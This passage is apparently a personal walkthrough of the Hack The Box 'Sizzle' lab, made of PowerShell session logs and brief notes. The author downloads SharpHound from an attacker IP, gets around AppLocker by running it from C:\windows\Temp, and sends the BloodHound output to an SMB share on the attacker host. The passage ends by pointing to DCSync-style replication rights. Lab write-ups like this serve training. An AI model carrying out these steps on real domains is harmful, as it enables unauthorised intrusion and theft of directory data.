transferred sharphound.exe to target machine
PS htb\amanda@SIZZLE Documents> curl http://10.10.14.10/SharpHound.exe -OutFile sharphound.exe
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Documents>
Error while running the exe file
.PS htb\amanda@SIZZLE Documents>.\sharphound.exe
Program 'sharphound.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ .\sharphound.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\sharphound.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
App locker bypass
I ll copy it to a place where users write stuff like in temp
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
Successful
PS htb\amanda@SIZZLE Documents> copy sharphound.exe C:\windows\Temp
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Documents> cd C:\windows\temp
PS htb\amanda@SIZZLE temp> ./sharphound.exe
2024-01-14T11:32:54.1055361-05:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-01-14T11:32:54.2774159-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-14T11:32:54.3086946-05:00|INFORMATION|Initializing SharpHound at 11:32 AM on 1/14/2024
2024-01-14T11:32:54.4805358-05:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for HTB.LOCAL : sizzle.HTB.LOCAL
2024-01-14T11:32:54.5117913-05:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-14T11:32:54.7774101-05:00|INFORMATION|Beginning LDAP search for HTB.LOCAL
2024-01-14T11:32:54.8242859-05:00|INFORMATION|Producer has finished, closing LDAP channel
i was not able to list files in tmp dir ->
PS htb\amanda@SIZZLE Temp> dir
Access to the path 'C:\windows\Temp' is denied.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : PermissionDenied: (C:\windows\Temp:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
so i guessed the bloodhoundfile name
It uses this format to name the files -> YYYYMMDDHHMMSS_BloodHound.zip.
PS htb\amanda@SIZZLE Temp> copy 20240114224703_BloodHound.zip C:/users/amanda/Desktop
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Desktop> dir
Directory: C:\users\amanda\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/14/2024 10:47 PM 11560 20240114224703_BloodHound.zip
PS htb\amanda@SIZZLE Desktop> net use S: \\10.10.14.10\s /user:ctf lover
Enter PEM pass phrase:
The command completed successfully.
copy 20240114224703_BloodHound.zip S:\
in short The principal getchanges is not bad until, We have Get-changes-all principal
And we have both get-changes and Get-changes-all
But first i need to escalate to mrlky user.